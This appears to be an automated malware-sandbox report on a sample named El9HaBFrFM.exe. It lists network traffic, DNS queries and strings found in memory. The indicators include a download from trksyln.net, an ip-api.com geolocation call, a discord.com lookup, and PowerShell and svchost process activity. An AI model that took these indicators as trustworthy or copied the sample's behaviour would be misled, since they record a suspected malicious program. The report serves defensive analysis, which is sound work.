              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /tgmacro/download HTTP/1.1Host: www.trksyln.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: www.trksyln.net
              Source: global trafficDNS traffic detected: DNS query: trksyln.net
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
              Source: global trafficDNS traffic detected: DNS query: analytics.google.com
              Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
              Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
              Source: global trafficDNS traffic detected: DNS query: a.fsdn.com
              Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
              Source: global trafficDNS traffic detected: DNS query: fundingchoicesmessages.google.com
              Source: global trafficDNS traffic detected: DNS query: um.simpli.fi
              Source: global trafficDNS traffic detected: DNS query: sync.ipredictive.com
              Source: global trafficDNS traffic detected: DNS query: odr.mookie1.com
              Source: global trafficDNS traffic detected: DNS query: s.uuidksinc.net
              Source: global trafficDNS traffic detected: DNS query: dsp.adkernel.com
              Source: global trafficDNS traffic detected: DNS query: bh.contextweb.com
              Source: global trafficDNS traffic detected: DNS query: www.temu.com
              Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
              Source: global trafficDNS traffic detected: DNS query: dclk-match.dotomi.com
              Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
              Source: global trafficDNS traffic detected: DNS query: a.c.appier.net
              Source: global trafficDNS traffic detected: DNS query: match.prod.bidr.io
              Source: global trafficDNS traffic detected: DNS query: sync.srv.stackadapt.com
              Source: global trafficDNS traffic detected: DNS query: sync2-dsp.e-volution.ai
              Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
              Source: global trafficDNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
              Source: global trafficDNS traffic detected: DNS query: dis.criteo.com
              Source: global trafficDNS traffic detected: DNS query: gtrace.mediago.io
              Source: global trafficDNS traffic detected: DNS query: ads.travelaudience.com
              Source: global trafficDNS traffic detected: DNS query: onetag-sys.com
              Source: global trafficDNS traffic detected: DNS query: widget.us.criteo.com
              Source: global trafficDNS traffic detected: DNS query: ep1.adtrafficquality.google
              Source: global trafficDNS traffic detected: DNS query: ep2.adtrafficquality.google
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /g/collect?v=2&tid=G-JH2MNQ1WXY&gtm=45je4au0v9106823843za200&_p=1730398761454&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&cid=1627253267.1730398763&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1730398763&sct=1&seg=0&dl=https%3A%2F%2Ftrksyln.net%2FError&dr=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&dt=trksyln%20-%20Error&en=page_view&_fv=2&_nsi=1&_ss=2&_c=1&_ee=1&tfd=3241 HTTP/1.1Host: analytics.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://trksyln.netX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Thu, 31 Oct 2024 18:19:20 GMTConnection: closeContent-Length: 70
              Source: El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digij
              Source: El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685BB000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.2243097224.00000250685BF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1794952138.00000250685BB000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685BF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1760578214.00000250685BF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685E1000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.2243289595.00000250685DD000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1728761239.00000250685BE000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1755640275.00000250685BE000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1893904529.00000250685D3000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1745188878.00000250685BE000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1979042378.0000021EDFE50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2106834306.0000026CD00EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950602383.000001C1A86AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 0000002E.00000002.1945615374.0000026CB6334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: svchost.exe, 0000003D.00000002.2950366204.000001C1A8600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
